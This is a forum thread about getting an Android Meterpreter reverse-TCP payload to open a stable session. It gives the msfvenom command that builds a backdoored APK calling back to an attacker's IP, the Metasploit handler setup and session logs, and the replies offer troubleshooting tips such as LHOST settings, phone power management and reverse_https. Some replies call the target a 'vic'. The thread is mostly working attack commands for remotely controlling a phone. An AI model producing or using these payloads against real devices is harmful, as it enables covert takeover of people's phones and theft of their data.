Forum Thread: Meterpreter on Android

Hi,

I'm looking for help in order to progress in my understanding of the use of Meterpreter over Android on a smartphone.

I currently have Kali 4.11 and the Metasploit suite on the attacker computer.
I also generated my Meterpreter payload using the following command:

msfvenom -p android/meterpreter/reverse_tcp LHOST=MY_WAN_IP_ADDRESS LPORT=4444 -a dalvik --platform android R -o /pentest-001.apk

Then I installed my payload over the Android 6.0.1 smartphone (a Lenovo P2) and I can see the MainActivity software installed.

Then, on the attacker computer, I typed (see bold):

msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST MY_LAN_IP_ADDRESS
LHOST => MY_LAN_IP_ADDRESS
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit
* Exploit running as background job 0.

From there, I start MainActivity on my smartphone (connected using 4G/LTE): I can see the following being printed on the attacker computer.

msf exploit(handler) >
* Sending stage (68925 bytes) to MY_WAN_IP_ADDRESS
* Meterpreter session 1 opened (MY_LAN_IP_ADDRESS:4444 -> MY_WAN_IP_ADDRESS:11501) at 2017-08-31 13:55:56 +0200
* negotiating tlv encryption
* negotiated tlv encryption
* negotiated tlv encryption
* MY_WAN_IP_ADDRESS - Meterpreter session 1 closed. Reason: Died

I can repeat the operation on and on, I never get the Meterpreter shell. I tried on different smartphones, BTW.

One precision: my attacker computer is behind 2 routers. Both routers forward port 4444 (the first one forwards to the 2nd router, and the 2nd router forwards to MY_LAN_IP_ADDRESS).

I also tested using port 443.

Thanks in advance for your help.

6 Responses

I also tested with only one router....

Change the WAN IP with your LAN IP address.

I am also getting the same problem. Can you tell us what the reason is?

Hey there.

I've got msf installed on my phone in Termux. I tried exploiting said phone, but every time I opened Termux to use the session it would die. I could only imagine it was because the backdoor wasn't persistent or being run as a service or anything, so it wouldn't run in the background. Just a theory, because I was able to run the listener on my computer no problem.

Point is, maybe you're having a similar issue. Maybe the vic is doing something that's killing the session.

Most phones have a setting in them to kill the Wi-Fi to save battery when the phone goes to sleep. They may even just kill idle processes...

Maybe that's causing it.

Just a thought, it's probably a long shot though.
I've also heard of people just using reverse_https instead. If all else fails I'd scrap the apk and try, try again lol

msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit
